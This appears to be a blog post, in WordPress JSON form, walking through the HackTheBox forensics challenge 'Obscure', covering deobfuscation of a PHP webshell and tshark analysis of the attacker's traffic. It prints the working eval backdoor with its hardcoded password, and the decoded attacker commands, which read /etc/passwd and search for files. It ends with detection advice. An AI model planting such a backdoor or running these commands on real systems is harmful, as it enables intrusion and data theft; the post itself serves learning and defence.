Obscure is an Easy-rated HackTheBox forensics challenge. You get a packet capture and a PHP webshell uploaded to a compromised Apache server via an arbitrary file upload vulnerability. The task is to analyse the shell and trace attacker activity through the traffic logs.<\/p>\n
The uploaded file is support.php. It is heavily obfuscated PHP using three layers: the outer layer is base64 encoded, the middle layer uses variable function calls to reconstruct strings, and the inner layer is the actual eval-based shell. Deobfuscating by replacing each layer with echo statements or running it through a PHP sandbox with eval replaced by print reveals the core:<\/p>\n
<?php\nif(isset($_POST[\"login\"])) {\n if($_POST[\"login\"] === base64_decode(\"c2VjdXJlUGFzc3dvcmQx\")) {\n $_SESSION[\"auth\"] = true;\n }\n}\nif($_SESSION[\"auth\"]) {\n eval(base64_decode($_POST[\"cmd\"]));\n}\n?><\/pre>\nThe login parameter accepts a hardcoded password that decodes to securePassword1. Once authenticated, the cmd parameter is base64 decoded and passed to eval. Functionally a complete remote code execution backdoor in a few lines.<\/p>\n
Following the traffic<\/h3>\ntshark -r obscure.pcap -Y \"http.request.method == POST and http contains support.php\" \\\n -T fields -e frame.number -e http.file_data | head -30<\/pre>\nDecoding the cmd field from each POST request in sequence reveals the attacker activity:<\/p>\n
Request 3: system('id'); # Response: www-data\nRequest 5: system('cat \/etc\/passwd');\nRequest 8: system('find \/ -name \"*.txt\" -readable 2>\/dev\/null');\nRequest 11: system('cat \/var\/www\/html\/flag.txt');<\/pre>\nFollowing the TCP stream for request 11 shows the flag in the HTTP response body.<\/p>\n
Detection perspective<\/h3>\n
New PHP files appearing in upload directories, POST requests to paths that should only contain static files, and web server worker processes spawning system shells are the three layers where this attack is detectable. A web server spawning \/bin\/sh or cmd.exe should trigger an immediate alert in any environment with process creation monitoring.<\/p>\n","protected":false},"excerpt":{"rendered":"
A walkthrough of the Obscure Easy forensics challenge on HackTheBox. An obfuscated PHP webshell uploaded to a compromised Apache server. Deobfuscation, traffic analysis, and flag recovery through Wireshark.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-114","post","type-post","status-publish","format-standard","hentry","category-hackthebox"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/114","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=114"}],"version-history":[{"count":9,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/114\/revisions"}],"predecessor-version":[{"id":345,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/114\/revisions\/345"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=114"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=114"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}